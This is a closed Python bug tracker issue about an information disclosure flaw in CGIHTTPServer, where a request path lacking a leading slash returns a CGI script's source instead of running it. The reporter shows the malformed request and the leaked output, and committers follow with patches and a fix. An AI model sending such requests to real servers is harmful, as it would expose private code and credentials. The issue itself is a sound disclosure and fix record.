classification
Title: Python CGIHTTPServer information disclosure
Type: security Stage:
Components: Library (Lib) Versions: Python 3.0, Python 2.6, Python 2.5
process
Status: closed Resolution: fixed
Dependencies: Superseder:
Assigned To: gregory.p.smith Nosy List: gpolo, gregory.p.smith, m.sucajtys
Priority: normal Keywords: patch

Created on 2008-03-07 19:59 by m.sucajtys, last changed 2009-04-06 06:39 by gregory.p.smith. This issue is now closed.

Files
File name Uploaded Description Edit
CGIHTTPServer_is_cgi_fix2.diff gpolo, 2008-03-07 21:10
CGIHTTPServer_is_cgi_doc_fix.diff gpolo, 2008-03-07 21:38 is_cgi docstring correction
Messages (7)
msg63361 - (view) Author: sumar (m.sucajtys) Date: 2008-03-07 19:59
================================================================================
Summary:
================================================================================
An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting cgi script (in example test.py) without / in the beginnig of URL 
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.

================================================================================
msg63364 - (view) Author: Guilherme Polo (gpolo) * (Python committer) Date: 2008-03-07 21:06
I'm attaching a patch that fixes this, it was done for rev 61179 (trunk).

Note that is_cgi method is incorrectly documented, even more now. Only
the first line in its docstring is correct now, before this patch, last
paragraph was correct too.
msg63365 - (view) Author: Guilherme Polo (gpolo) * (Python committer) Date: 2008-03-07 21:10
oops, I was doing some tests in the last patch and left a bug in it. I'm
attaching a new one.
msg63368 - (view) Author: Guilherme Polo (gpolo) * (Python committer) Date: 2008-03-07 21:38
This corrects is_cgi docstring (maybe this should be done in a new
issue?). It also removes a part of it that I believe to not be
necessary, someone correct me if I'm wrong.
msg67335 - (view) Author: Gregory P. Smith (gregory.p.smith) * (Python committer) Date: 2008-05-25 09:23
Could you please create a test case for this as a patch to
Lib/test/test_httpservers.py?

thanks!
msg85596 - (view) Author: Gregory P. Smith (gregory.p.smith) * (Python committer) Date: 2009-04-06 00:23
fyi - Your patch does not work on windows as it uses os.path for uri
manipulation.  that means it behaves differently with regards to / and \
based on platform.

I'm making a new one.  I've written a unittest.  should be fixed soon.
msg85614 - (view) Author: Gregory P. Smith (gregory.p.smith) * (Python committer) Date: 2009-04-06 06:39
Fixed in trunk r71303.

This potentially changes the behavior of CGIHTTPServer (for the better)
so this is probably not appropriate to backport to a release branch
unless someone really considers the security of this to be severe.

If backported, the new module function should be expanded inline to
avoid adding a new (though undocumented) API.

Closing.
History
Date User Action Args
2009-04-06 06:39:35gregory.p.smithsetstatus: open -> closed
resolution: fixed
messages: + msg85614

versions: + Python 2.6, Python 3.0
2009-04-06 06:24:35gregory.p.smithsetfiles: - CGIHTTPServer_is_cgi_fix.diff
2009-04-06 00:23:31gregory.p.smithsetmessages: + msg85596
2008-05-25 09:23:25gregory.p.smithsetpriority: normal
assignee: gregory.p.smith
messages: + msg67335
nosy: + gregory.p.smith
2008-03-07 21:38:38gpolosetfiles: + CGIHTTPServer_is_cgi_doc_fix.diff
messages: + msg63368
2008-03-07 21:10:19gpolosetfiles: + CGIHTTPServer_is_cgi_fix2.diff
messages: + msg63365
2008-03-07 21:06:02gpolosetfiles: + CGIHTTPServer_is_cgi_fix.diff
keywords: + patch
messages: + msg63364
nosy: + gpolo
2008-03-07 19:59:44m.sucajtyscreate